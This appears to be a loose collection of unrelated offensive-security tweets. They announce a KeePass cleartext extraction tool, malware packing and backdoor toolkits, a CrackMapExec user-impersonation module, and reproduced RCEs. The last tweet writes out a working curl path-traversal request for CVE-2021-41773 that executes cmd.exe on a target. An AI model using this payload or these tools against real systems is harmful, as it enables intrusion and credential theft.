My good friend @cd_root_ is looking for a new job. If you have an open position for senior pentesters, please reach out to him. Others pls rt for visibility :).
Thank you.
PoC for arbitrary file delete/move in #Razer Macro module that is not fixed as their bug hunting team do not consider this a bug but an exploit 🙃.
https://t.co/XnKnmH1q7c
Execute commands as another user w/t dumping LSASS or touching the ADCS server? Thanks to @Defte_ a new module has been added to CrackMapExec 🚀
The module will impersonate any logged on user to exec command as "this" user (system, domain user etc) 🔥
Just released KeeFarce Reborn, yet another offensive KeePass extraction tool featuring a standalone DLL that exports databases in cleartext once injected in the KeePass process 🔓
https://t.co/uHc5I8RFVo
🔥Working hard on a public release of my Malware Dev CI/CD toolkit
☢️ProtectMyTooling - Multi-Packer, supporting 23+ obfuscators
☢️RedBackdoorer - PE shellcode injection via 6 techniques
☢️RedWatermarker - IOC injector for implants tracking
Already available to my sponsors 😁✨
Reproduced the MS-MSDT Office RCE (on up-to-date Win10 and up-to-date Office 2019). Had some troubles with building the appropriate docx with external HTML reference, so quickly made some notes on how to do it, step-by-step: https://t.co/zutxokWF4W
Never tried this before! 200 RTs and I will do an 'Introduction to Azure Penetration Testing' class for FREE sometime during the Holiday season. #Azure #Pentesting #redteam
CVE-2021-41773 was such a weird bug to see in 2021. I can't believe that this actually worked. On Windows stdin/stdout doesn't appear mapped to exec'd binaries but GET args work fine.
* curl -vv "http://x.x.x.x/cgi-bin/.%2e/.%2e/.%2e/.%2e/Windows/System32/cmd.exe?/c+calc.exe"